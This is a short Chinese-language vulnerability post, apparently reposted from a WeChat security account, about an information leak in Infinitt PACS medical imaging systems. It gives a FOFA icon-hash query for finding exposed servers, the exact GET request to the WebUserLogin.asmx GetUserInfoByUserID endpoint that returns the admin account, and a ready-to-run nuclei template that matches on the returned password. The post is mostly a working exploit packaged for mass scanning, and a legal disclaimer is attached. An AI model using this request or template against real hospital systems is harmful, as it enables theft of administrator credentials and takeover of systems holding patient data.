漏洞简介
英飞达影像存档与通讯(PACS)系统存在信息泄露漏洞,攻击者可以通过该漏洞获取管理员信息,进而登录控制整个系统。
影响版本
全版本
资产测绘
fofa-query: icon_hash="1474455751" || icon_hash="702238928"
漏洞poc
GET /webservices/WebUserLogin.asmx/GetUserInfoByUserID?userID=admin
复现成功:
nuclei脚本:
获取nuclei形式的POC以及fofa语句查询后的资产
id: infinitt-WebUserLogin-info-leak info: name: 英飞达医学WebUserLogin信息泄露漏洞 author: Simple severity: medium description: | 英飞达医学WebUserLogin.asmx接口存在信息泄露漏洞。 reference: - https://github.com/JJThome metadata: fofa-query: icon_hash="1474455751" || icon_hash="702238928" http: - method: GET path: - "{{BaseURL}}/webservices/WebUserLogin.asmx/GetUserInfoByUserID?userID=admin" matchers: - type: dsl dsl: - contains(body,"<web_user_login>") - contains(body,"<PASSWORD>") - status_code == 200 condition: and
原文始发于微信公众号(simple学安全):英飞达医学WebUserLogin信息泄露漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论